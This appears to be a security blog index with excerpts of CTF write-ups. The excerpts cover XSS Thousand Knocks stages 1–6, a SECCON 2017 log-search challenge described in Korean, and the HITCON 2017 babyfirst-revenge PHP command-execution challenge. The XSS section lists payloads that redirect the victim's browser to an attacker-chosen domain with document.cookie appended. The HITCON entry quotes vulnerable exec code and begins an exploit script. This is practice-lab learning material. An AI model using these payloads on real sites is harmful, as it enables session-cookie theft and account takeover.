[KnockXss] Stage 1 to 6

XSS Thousand Knocks[link] {} == your domain > ex) http://xss.silnex.kr/ Skip stage url, payload only I open stage 1 to 6 Stage 1 /?location=%22http://example.com/?%22%2Bdocument.cookie Stage 2 /?q=<script>location=”{}?”%2bdocument.cookie</script> Stage 3 /?q=”><script>location=”{}?”+document.cookie</script> Stage 4 /?q=’><script>location='{}?’+document.cookie</script> Stage 5 /?q=</textarea><script>location='{}?’+document.cookie</script> Stage 6 /?q=</xmp><img+src=1+onerror=location='{}?’+document.cookie> Stage 7 to 34 were hidden.

[SECCON 2017] Web Challenge review

Log Search[link]   들어가면 화면 아래 쪽에 “http://logsearch.pwn.seccon.jp/logsearch.php“링크가 있다. 해당 링크로 들어가면 현재 검색된 로그들이 주르륵 뜬다. 여기서 flag파일을 찾으란다. 우리가 원하는건 접근 경로에 flag가 들어가고 반응이 200인거니 flag 200 을 처보았지만 다른 로그들에 뭍혀 flag 로그가 나오지 않는다. 이걸 request:flag AND response:200이렇게 쳐줘야 flag 200 접근이 되는 로그가 나오며 flag를 볼 수 있다. 아니 저걸 …

[HITCON 2017] babyfirst-revenge Write up&Explanation

HITCON 2017[Link] Do you remember BabyFirst from HITCON CTF 2015? This is the harder version! http://52.199.204.34/ 95 Solved Challenge <?php $sandbox = ‘/www/sandbox/’ . md5(“orange” . $_SERVER[‘REMOTE_ADDR’]); @mkdir($sandbox); @chdir($sandbox); if (isset($_GET[‘cmd’]) && strlen($_GET[‘cmd’]) <= 5) { @exec($_GET[‘cmd’]); } else if (isset($_GET[‘reset’])) { @exec(‘/bin/rm -rf ‘ . $sandbox); } highlight_file(__FILE__); Exploit import requests from time import sleep from …